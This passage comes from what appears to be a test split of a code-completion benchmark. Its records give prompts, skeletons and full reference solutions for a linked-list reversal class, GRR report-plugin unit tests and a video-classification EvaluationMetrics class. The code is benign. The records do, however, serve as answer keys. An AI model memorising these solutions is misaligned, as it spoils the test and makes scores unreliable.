"stack_v2_sparse_classes_10k_test_000315", "length_bytes": 1623, "license_type": "permissive", "methods": [{"docstring": "Natural solutions (iteratively and recursively)", "name": "reverseList", "signature": "def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]"}, {"docstring": "recursively", "name": "reverseList1", "signature": "def reverseList1(self, head)"}, {"docstring": "iteratively", "name": "reverseList2", "signature": "def reverseList2(self, head)"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]: Natural solutions (iteratively and recursively)\n- def reverseList1(self, head): recursively\n- def reverseList2(self, head): iteratively", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]: Natural solutions (iteratively and recursively)\n- def reverseList1(self, head): recursively\n- def reverseList2(self, head): iteratively\n\n<|skeleton|>\nclass Solution:\n\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions (iteratively and recursively)\"\"\"\n <|body_0|>\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n <|body_1|>\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n<|end_body_0|>\n\n<|body_start_1|>\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n<|end_body_1|>\n\n<|body_start_2|>\n if not head:\n return head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n<|end_body_2|>\n", "revision_id": "49a0b03c55d8a702785888d473ef96539265ce9c", "skeleton": "<|skeleton|>\nclass Solution:\n\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions 
(iteratively and recursively)\"\"\"\n <|body_0|>\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n <|body_1|>\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"Natural solutions (iteratively and recursively)\"\"\"\n prev = None\n while head:\n next_node = head.next\n head.next = prev\n prev = head\n head = next_node\n return prev\n\n def reverseList1(self, head):\n \"\"\"recursively\"\"\"\n if not (head and head.next):\n return head\n res = self.reverseList(head.next)\n head.next.next = head\n head.next = None\n return res\n\n def reverseList2(self, head):\n \"\"\"iteratively\"\"\"\n if not head:\n return head\n res = ListNode(0)\n while head:\n cur = res.next\n res.next = ListNode(head.val)\n res.next.next = cur\n head = head.next\n return res.next\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode/0206_reverse_linked_list.py", "source_repo": "chaosWsF/Python-Practice", "split": "test", "star_events_count": 1} {"blob_id": "be2f10e3e04444372375cc9c2c48e0cd675760a4", "bodies": ["with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())", "with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)", "desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\nself.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\nself.assertEqual(desc.title, 'Bar Activity')\nself.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\nself.assertEqual(desc.requires_time_range, True)"], "bodies_text": "<|body_start_0|>\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n<|end_body_0|>\n\n<|body_start_1|>\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n<|end_body_1|>\n\n<|body_start_2|>\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ReportPluginsTest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ReportPluginsTest:\n\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n <|body_0|>\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n <|body_1|>\n\n def testGetReportDescriptor(self):\n 
\"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n<|end_body_0|>\n\n<|body_start_1|>\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n<|end_body_1|>\n\n<|body_start_2|>\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000316", "length_bytes": 34681, "license_type": "permissive", "methods": [{"docstring": "Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.", "name": "testGetAvailableReportPlugins", "signature": "def testGetAvailableReportPlugins(self)"}, {"docstring": "Ensure GetReportByName instantiates correct subclasses based on name.", "name": "testGetReportByName", "signature": "def testGetReportByName(self)"}, {"docstring": "Ensure GetReportDescriptor returns a correctly filled in proto.", "name": "testGetReportDescriptor", "signature": "def testGetReportDescriptor(self)"}], "n_methods": 3, "prompt": "Implement the Python class `ReportPluginsTest` described below.\n\nClass description:\nImplement the ReportPluginsTest class.\n\nMethod signatures and docstrings:\n- def testGetAvailableReportPlugins(self): Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\n- def testGetReportByName(self): Ensure GetReportByName instantiates correct subclasses based on name.\n- def testGetReportDescriptor(self): Ensure GetReportDescriptor returns a correctly filled in proto.", "prompted_full_text": "Implement the Python class `ReportPluginsTest` described below.\n\nClass description:\nImplement the ReportPluginsTest class.\n\nMethod signatures and docstrings:\n- def testGetAvailableReportPlugins(self): Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\n- def testGetReportByName(self): Ensure GetReportByName instantiates correct subclasses based on name.\n- def testGetReportDescriptor(self): Ensure GetReportDescriptor returns a correctly filled in proto.\n\n<|skeleton|>\nclass ReportPluginsTest:\n\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n <|body_0|>\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n <|body_1|>\n\n def testGetReportDescriptor(self):\n \"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n<|end_body_0|>\n\n<|body_start_1|>\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = 
report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n<|end_body_1|>\n\n<|body_start_2|>\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n<|end_body_2|>\n", "revision_id": "44c0eb8c938302098ef7efae8cfd6b90bcfbb2d6", "skeleton": "<|skeleton|>\nclass ReportPluginsTest:\n\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n <|body_0|>\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n <|body_1|>\n\n def testGetReportDescriptor(self):\n \"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ReportPluginsTest:\n def testGetAvailableReportPlugins(self):\n \"\"\"Ensure GetAvailableReportPlugins lists ReportPluginBase's subclasses.\"\"\"\n with report_plugins_test_mocks.MockedReportPlugins():\n self.assertIn(report_plugins_test_mocks.FooReportPlugin, report_plugins.GetAvailableReportPlugins())\n self.assertIn(report_plugins_test_mocks.BarReportPlugin, report_plugins.GetAvailableReportPlugins())\n\n def testGetReportByName(self):\n \"\"\"Ensure GetReportByName instantiates correct subclasses based on name.\"\"\"\n with report_plugins_test_mocks.MockedReportPlugins():\n report_object = report_plugins.GetReportByName('BarReportPlugin')\n self.assertIsInstance(report_object, report_plugins_test_mocks.BarReportPlugin)\n\n def testGetReportDescriptor(self):\n \"\"\"Ensure GetReportDescriptor returns a correctly filled in proto.\"\"\"\n desc = report_plugins_test_mocks.BarReportPlugin.GetReportDescriptor()\n self.assertEqual(desc.type, rdf_report_plugins.ApiReportDescriptor.ReportType.SERVER)\n self.assertEqual(desc.title, 'Bar Activity')\n self.assertEqual(desc.summary, \"Reports bars' activity in the given time range.\")\n self.assertEqual(desc.requires_time_range, True)\n", "source": "the_stack_v2_python_sparse", "source_path": "grr/server/grr_response_server/gui/api_plugins/report_plugins/report_plugins_test.py", "source_repo": "google/grr", "split": "test", "star_events_count": 4683} {"blob_id": "6639a52fe035376e27d36b6c69b3fa15f564f458", "bodies": ["self.sum_hit_at_one = 0.0\nself.sum_perr = 0.0\nself.sum_loss = 0.0\nself.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\nself.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\nself.pr_calculator = PRCalculator()\nself.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\nself.accumulate_per_tag = accumulate_per_tag\nself.top_k = top_k\nself.num_examples = 0\nself.nums_per_tag = np.zeros(num_class)\nself.tag_correlation = np.zeros((num_class, num_class))\nself.tag_confidence = np.zeros(num_class)", "batch_size = labels.shape[0]\nmean_hit_at_one = calculate_hit_at_one(predictions, labels)\nmean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\nmean_loss = loss\nself.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\nself.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, 
labels, self.top_k)\nself.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\nself.pr_calculator.accumulate(predictions, labels)\nif self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\nsparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\nself.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\nself.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\nself.num_examples += batch_size\nself.sum_hit_at_one += mean_hit_at_one * batch_size\nself.sum_perr += mean_perr * batch_size\nself.sum_loss += mean_loss * batch_size\nreturn {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}", "if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\navg_hit_at_one = self.sum_hit_at_one / self.num_examples\navg_perr = self.sum_perr / self.num_examples\navg_loss = self.sum_loss / self.num_examples\naps = self.map_calculator.peek_map_at_n()\ngap = self.global_ap_calculator.peek_ap_at_n()\ntag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\nprecision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\nrecall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\nprecision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\nrecall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\ntag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\ntag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\nepoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\nreturn epoch_info_dict", "self.sum_hit_at_one = 0.0\nself.sum_perr = 0.0\nself.sum_loss = 0.0\nself.map_calculator.clear()\nself.global_ap_calculator.clear()\nself.pr_calculator.clear()\nself.pr_calculator_per_tag.clear()\nself.num_examples = 0\nself.tag_correlation = 0.0\nself.nums_per_tag = 0.0\nself.tag_confidence = 0.0"], "bodies_text": "<|body_start_0|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_correlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n 
self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n<|end_body_1|>\n\n<|body_start_2|>\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n<|end_body_2|>\n\n<|body_start_3|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n<|end_body_3|>\n", "class_docstring": "A class to store the evaluation metrics.", "class_name": "EvaluationMetrics", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot be constructed.\"\"\"\n <|body_0|>\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. 
Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n <|body_2|>\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_correlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n<|end_body_1|>\n\n<|body_start_2|>\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = self.pr_calculator.get_precision_at_conf(0.5)\n recall_at_5 = self.pr_calculator.get_recall_at_conf(0.5)\n tag_precision = self.pr_calculator_per_tag.get_precision_list(0.5) if self.accumulate_per_tag else []\n tag_recall = self.pr_calculator_per_tag.get_recall_list(0.5) if self.accumulate_per_tag else []\n epoch_info_dict = {'avg_hit_at_one': avg_hit_at_one, 'avg_perr': avg_perr, 'avg_loss': avg_loss, 'aps': aps, 'gap': gap, 'num': self.nums_per_tag, 'tag_correlation': self.tag_correlation, 'tag_confidence': tag_confidence, 'precision_at_1': precision_at_1, 'recall_at_1': recall_at_1, 'precision_at_5': precision_at_5, 'recall_at_5': recall_at_5, 
'tag_precision': tag_precision, 'tag_recall': tag_recall}\n return epoch_info_dict\n<|end_body_2|>\n\n<|body_start_3|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator.clear()\n self.global_ap_calculator.clear()\n self.pr_calculator.clear()\n self.pr_calculator_per_tag.clear()\n self.num_examples = 0\n self.tag_correlation = 0.0\n self.nums_per_tag = 0.0\n self.tag_confidence = 0.0\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000317", "length_bytes": 24184, "license_type": "no_license", "methods": [{"docstring": "Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot be constructed.", "name": "__init__", "signature": "def __init__(self, num_class, top_k, accumulate_per_tag=False)"}, {"docstring": "Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.", "name": "accumulate", "signature": "def accumulate(self, predictions, labels, loss)"}, {"docstring": "Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).", "name": "get", "signature": "def get(self)"}, {"docstring": "Clear the evaluation metrics and reset the EvaluationMetrics object.", "name": "clear", "signature": "def clear(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006081", "prompt": "Implement the Python class `EvaluationMetrics` described below.\n\nClass description:\nA class to store the evaluation metrics.\n\nMethod signatures and docstrings:\n- def __init__(self, num_class, top_k, accumulate_per_tag=False): Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot be constructed.\n- def accumulate(self, predictions, labels, loss): Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\n- def get(self): Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. 
The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\n- def clear(self): Clear the evaluation metrics and reset the EvaluationMetrics object.", "prompted_full_text": "Implement the Python class `EvaluationMetrics` described below.\n\nClass description:\nA class to store the evaluation metrics.\n\nMethod signatures and docstrings:\n- def __init__(self, num_class, top_k, accumulate_per_tag=False): Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot be constructed.\n- def accumulate(self, predictions, labels, loss): Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\n- def get(self): Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. 
The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\n- def clear(self): Clear the evaluation metrics and reset the EvaluationMetrics object.\n\n<|skeleton|>\nclass EvaluationMetrics:\n \"\"\"A class to store the evaluation metrics.\"\"\"\n\n def __init__(self, num_class, top_k, accumulate_per_tag=False):\n \"\"\"Construct an EvaluationMetrics object to store the evaluation metrics. Args: num_class: A positive integer specifying the number of classes. top_k: A positive integer specifying how many predictions are considered per video. Raises: ValueError: An error occurred when MeanAveragePrecisionCalculator cannot be constructed.\"\"\"\n <|body_0|>\n\n def accumulate(self, predictions, labels, loss):\n \"\"\"Accumulate the metrics calculated locally for this mini-batch. Args: predictions: A numpy matrix containing the outputs of the model. Dimensions are 'batch' x 'num_classes'. labels: A numpy matrix containing the ground truth labels. Dimensions are 'batch' x 'num_classes'. loss: A numpy array containing the loss for each sample. Returns: dictionary: A dictionary storing the metrics for the mini-batch. Raises: ValueError: An error occurred when the shape of predictions and actuals does not match.\"\"\"\n <|body_1|>\n\n def get(self):\n \"\"\"Calculate the evaluation metrics for the whole epoch. Raises: ValueError: If no examples were accumulated. Returns: dictionary: a dictionary storing the evaluation metrics for the epoch. The dictionary has the fields: avg_hit_at_one, avg_perr, avg_loss, and aps (default nan).\"\"\"\n <|body_2|>\n\n def clear(self):\n \"\"\"Clear the evaluation metrics and reset the EvaluationMetrics object.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.sum_hit_at_one = 0.0\n self.sum_perr = 0.0\n self.sum_loss = 0.0\n self.map_calculator = map_calculator.MeanAveragePrecisionCalculator(num_class)\n self.global_ap_calculator = ap_calculator.AveragePrecisionCalculator()\n self.pr_calculator = PRCalculator()\n self.pr_calculator_per_tag = PRCalculatorPerTag(num_class)\n self.accumulate_per_tag = accumulate_per_tag\n self.top_k = top_k\n self.num_examples = 0\n self.nums_per_tag = np.zeros(num_class)\n self.tag_correlation = np.zeros((num_class, num_class))\n self.tag_confidence = np.zeros(num_class)\n<|end_body_0|>\n\n<|body_start_1|>\n batch_size = labels.shape[0]\n mean_hit_at_one = calculate_hit_at_one(predictions, labels)\n mean_perr = calculate_precision_at_equal_recall_rate(predictions, labels)\n mean_loss = loss\n self.nums_per_tag = self.nums_per_tag + get_tag_stat(labels)\n self.tag_correlation = self.tag_correlation + get_tag_correlation(predictions, labels, self.top_k)\n self.tag_confidence = self.tag_confidence + get_tag_confidence(predictions, labels)\n self.pr_calculator.accumulate(predictions, labels)\n if self.accumulate_per_tag:\n self.pr_calculator_per_tag.accumulate(predictions, labels)\n sparse_predictions, sparse_labels, num_positives = top_k_by_class(predictions, labels, self.top_k)\n self.map_calculator.accumulate(sparse_predictions, sparse_labels, num_positives)\n self.global_ap_calculator.accumulate(flatten(sparse_predictions), flatten(sparse_labels), sum(num_positives))\n self.num_examples += batch_size\n self.sum_hit_at_one += mean_hit_at_one * batch_size\n self.sum_perr += mean_perr * batch_size\n self.sum_loss += mean_loss * batch_size\n return {'hit_at_one': mean_hit_at_one, 'perr': mean_perr, 'loss': mean_loss}\n<|end_body_1|>\n\n<|body_start_2|>\n if self.num_examples <= 0:\n raise ValueError('total_sample must be positive.')\n avg_hit_at_one = self.sum_hit_at_one / self.num_examples\n avg_perr = self.sum_perr / self.num_examples\n avg_loss = self.sum_loss / self.num_examples\n aps = self.map_calculator.peek_map_at_n()\n gap = self.global_ap_calculator.peek_ap_at_n()\n tag_confidence = self.tag_confidence / (self.nums_per_tag + 1e-10)\n precision_at_1 = self.pr_calculator.get_precision_at_conf(0.1)\n recall_at_1 = self.pr_calculator.get_recall_at_conf(0.1)\n precision_at_5 = 